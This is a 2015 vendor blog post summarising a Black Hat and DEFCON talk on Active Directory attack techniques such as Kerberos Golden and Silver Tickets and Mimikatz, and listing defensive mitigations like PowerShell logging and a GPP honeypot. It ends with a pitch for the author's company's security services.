Sep 01, 2015 By Jean-Paul Bergeaux In Blog

Insights from Black Hat and DEFCON 2015: Active Directory vulnerabilities pose risks

Although it didn’t make a big news splash, one of the best presentations at both Black Hat and DEFCON provided a comprehensive summary of all vulnerabilities, configuration issues, and best security practices for enterprises using Microsoft Active Directory.

This was the first presentation at these conferences by Sean Metcalf, who is more known for his Microsoft prowess (which is considerable!). The best way to describe his presentation: Wow, that’s a lot of vulnerabilities!

Discussing everything from how attackers get Domain Admin rights quickly, to well-documented vulnerabilities and weak configurations that are common in most enterprises, Sean laid out just how easy it is for bad actors to not only gain access, but persist in environments once they are in.

Starting with the premise that perimeter defenses will not prevent APT bad actors from getting inside, Sean explained how attackers use power shell, Kerberos Golden and Silver Tickets, service accounts, Mimikatz, and various Active Directory nuances to move freely and stay as long as they like.

It’s important to note that Sean did not bring up WMI, except to point out that power shell gives direct access to it.  So the information he provided needs to be combined with the incredibly important WMI presentation given by the FLARE team.  I will be writing more about that soon.

So what do we do with all this information?

Sean offered some detailed mitigations to shore up MS AD environments.  Some of the recommendations include:

  • A simple Group Policy Configuration change that will alert you to illegitimate access attempts (He called it a GPP HoneyPot).
  • Logging all PowerShell acitivity with some recommendations on what to alert on in the logs.
  • Ways to detect and mitigate against TGT and TGS vulnerabilities.
  • Tips for locking down PowerShell without causing administrators problems.
  • Details on PowerShell security enhancements and how to use them.
  • Three pages of configuration recommendations to help mitigate AD attacks.

Sean’s presentation, which provides extensive details and additional recommendations, can be found at both the Black Hat  and DEFCON websites.

Agencies should review these recommendations and make sure they are implemented.  Some of the  recommendations will meet resistance because of the changes in the environment admins will have to make in their routine, but recent incidents clearly demonstrate that security is more important than convenience.  For more assistance in hardening your environments with these mitigations, you can contact SwishData to scope an engagement with our Security Services group.

Stayed tuned for more security updates from Black Hat and DEFCON.